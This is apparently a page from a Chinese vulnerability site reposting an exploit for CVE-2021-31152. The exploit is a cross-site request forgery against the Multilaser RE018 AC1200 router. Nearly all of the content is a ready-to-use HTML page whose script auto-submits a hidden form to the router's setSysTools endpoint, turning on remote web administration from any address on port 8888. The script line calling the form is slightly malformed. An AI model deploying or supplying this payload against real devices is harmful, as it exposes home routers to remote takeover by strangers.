CVE-2021-31152 Multilaser Router RE018 AC1200 跨站请求伪造漏洞（启用远程访问）

EXP

# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
# Date: 14/04/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: CVE-2021-31152

#Exploit code:
<html>
	<body>
		<form action="http://192.168.0.1/goform/setSysTools" method="POST">
		    <input name="module4" value="remoteWeb" type="hidden">
		    <input name="remoteWebType" value="any" type="hidden">
		    <input name="remoteWebIP" value="" type="hidden">
		    <input name="remoteWebPort" value="8888" type="hidden">
            	    <input type="submit" value="Submit request">
		</form>
	</body>
	<script>
		document.forms0.submit();
	</script>
	</body>
</html>

EXP

相关文章